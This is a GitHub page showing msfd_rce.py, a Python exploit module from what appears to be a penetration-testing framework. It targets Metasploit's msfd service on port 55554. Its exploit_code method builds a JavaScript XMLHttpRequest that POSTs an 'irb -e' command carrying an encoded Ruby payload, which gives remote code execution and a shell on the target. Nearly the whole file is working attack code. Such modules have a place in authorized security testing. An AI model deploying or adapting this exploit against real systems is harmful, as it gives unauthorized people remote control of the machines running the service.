-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathmsfd_rce.py
37 lines (34 loc) · 1.29 KB
/
msfd_rce.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
#!/usr/bin/env python3
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
from lib.module.exploit import ExploitClass
from lib.module import payload
from lib.module.safety import Safety
from lib.module.intrusiveness import Intrusiveness
class ExploitModule(ExploitClass):
def __init__(self):
super().__init__(**{
'Name': 'Metasploit MSFD Remote Code Execution',
'Description': """
This module targets Metasploit's msfd-program. When msfd is running, an attacker with IP
access can spawn a remote shell on the system.
""",
'options': [],
'Ports': [55554],
'payload': {
"arch": payload.ARCH_RUBY,
"badchars": "\x00\x0a\x27"
},
'classification': (Safety.LIKELY_SAFE, Intrusiveness.NONE),
'products':[
{"product":"Metasploit MSFD"}
]
})
def exploit_code(self, payload):
data = """
var xml = new XMLHttpRequest();
xml.open("POST","/", true);
var sc = String('""" + payload.encoded() + """');
xml.send("irb -e \\"" + sc + "\\"\\n");"""
return data